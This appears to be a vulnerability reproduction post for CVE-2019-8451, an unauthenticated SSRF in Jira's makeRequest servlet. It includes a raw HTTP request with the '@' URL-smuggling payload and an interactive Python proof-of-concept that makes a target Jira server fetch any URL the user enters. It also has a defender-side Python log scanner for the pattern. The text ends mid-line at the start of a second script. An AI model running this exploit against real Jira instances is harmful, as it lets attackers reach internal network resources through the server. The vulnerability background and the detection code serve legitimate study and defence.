Reproducing the Jira Unauthenticated SSRF Vulnerability (CVE-2019-8451)

0x00 Vulnerability Background

Jira's /plugins/servlet/gadgets/makeRequest resource has an SSRF vulnerability caused by a logic flaw in the JiraWhitelist class. A remote attacker who successfully exploits it can access intranet resources with the identity of the Jira server. Analysis shows that the vulnerability can be triggered without any credentials.

0x01 Affected Versions

< 8.4.0

This vulnerability was introduced in Jira Server 7.6.0 and fixed in 7.13.9 and 8.4.0.

0x02 Reproduction

Atlassian Jira v7.13.0 (used as the example here; this version is vulnerable), download address:

https://product-downloads.atlassian.com/software/jira/downloads/atlassian-jira-software-7.13.0-x64.exe

The installation process is not described here (follow the installer prompts; first register an account on the official site to obtain a trial license key, then install).

Send the following request through Burp Suite; the response shows that the target is confirmed to have the SSRF vulnerability:

GET /plugins/servlet/gadgets/makeRequest?url=http://10.206.1.8:8080@www.baidu.com HTTP/1.1
Host: 10.206.1.8:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
X-Atlassian-Token: no-check
Connection: close
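The request above hides the real destination after '@' in the url parameter, so the call looks like it targets the Jira base URL while the server actually fetches www.baidu.com. As an added defender-side example (not code from the original post), the script below flags that pattern in web-server access logs: it parses Common Log Format lines (an assumption about the log layout), extracts the url parameter of makeRequest calls, and reports any whose URL carries userinfo or resolves to a host outside an allowed set; the log lines and the allowed-host set are constructed for the example.

```python
import re
from urllib.parse import parse_qs, urlsplit

MAKE_REQUEST_PATH = "/plugins/servlet/gadgets/makeRequest"
# Common Log Format: client ident user [time] "METHOD target PROTO" status ...
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) \S+" (?P<status>\d{3})')


def inspect_make_request(target, allowed_hosts):
    """Return a finding dict for a suspicious makeRequest target, or None."""
    parts = urlsplit(target)
    if parts.path != MAKE_REQUEST_PATH:
        return None
    urls = parse_qs(parts.query).get("url")  # parse_qs percent-decodes the value
    if not urls:
        return None
    fetched = urlsplit(urls[0])
    reasons = []
    # Everything before '@' is userinfo, so "http://10.206.1.8:8080@www.baidu.com"
    # has username "10.206.1.8", password "8080" and hostname "www.baidu.com".
    if fetched.username is not None:
        reasons.append("userinfo-in-url")
    if fetched.hostname and fetched.hostname.lower() not in allowed_hosts:
        reasons.append("host-not-allowed:" + fetched.hostname)
    if not reasons:
        return None
    return {"url_param": urls[0], "real_host": fetched.hostname, "reasons": reasons}


def scan_log(lines, allowed_hosts):
    """Apply inspect_make_request to each parseable log line; return findings in order."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        finding = inspect_make_request(m.group("target"), allowed_hosts)
        if finding:
            finding.update(ip=m.group("ip"), status=m.group("status"))
            findings.append(finding)
    return findings


# Constructed sample lines: the page's payload, a plain fetch of another host, a normal page view.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Sep/2019:10:00:00 +0000] "GET /plugins/servlet/gadgets/makeRequest?url=http://10.206.1.8:8080@www.baidu.com HTTP/1.1" 200 512',
    '203.0.113.5 - - [10/Sep/2019:10:00:05 +0000] "GET /plugins/servlet/gadgets/makeRequest?url=http%3A%2F%2F10.0.0.5%3A8080%2F HTTP/1.1" 200 80',
    '198.51.100.7 - - [10/Sep/2019:10:01:00 +0000] "GET /secure/Dashboard.jspa HTTP/1.1" 200 1024',
]
```

The allowed-host set should mirror the instance's own gadget whitelist, since legitimate gadgets do fetch from configured external hosts.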

0x03 Verification

The verification POC is as follows:

import requests
import sys

# Example: http://10.206.1.8:8080/plugins/servlet/gadgets/makeRequest?url=http://10.206.1.8:8080@www.baidu.com/


def ssrf_poc(url, ssrf_url):
    # strip a trailing slash so the path concatenation below stays clean
    url = url.rstrip('/')

    # the Jira base URL is placed before '@' (the JiraWhitelist logic flaw
    # described above), so the server ends up fetching ssrf_url
    vuln_url = url + "/plugins/servlet/gadgets/makeRequest?url=" + url + '@' + ssrf_url

    headers = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0",
        "Accept": "*/*",
        "Accept-Language": "zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
        "Accept-Encoding": "gzip, deflate",
        "X-Atlassian-Token": "no-check",
        "Connection": "close"
    }

    r = requests.get(url=vuln_url, headers=headers)
    # makeRequest wraps the fetched response, so the proxied headers show up in the body
    if r.status_code == 200 and 'set-cookie' in r.text:
        print("\n>>>>Send poc Success!\n")
        print('X-AUSERNAME= %s' % r.headers.get('X-AUSERNAME'))
        print("\n>>>>vuln_url= " + vuln_url + '\n')
        print(r.text)
    else:
        print("No Vuln Exit!")


if __name__ == "__main__":
    # target Jira instance: taken from the command line, otherwise change the default to your own target
    url = sys.argv[1] if len(sys.argv) > 1 else "http://10.206.1.8:8080"
    while True:
        print()
        ssrf_url = input(">>>>SSRF URL: ")
        ssrf_poc(url, ssrf_url)

Run it as:

python CVE-2019-8451.py http://10.206.1.8:8080/
Alternatively:
#!/usr/bin/env python3
import argparse
import requests
import re

G, B, R, W, M, C, end = '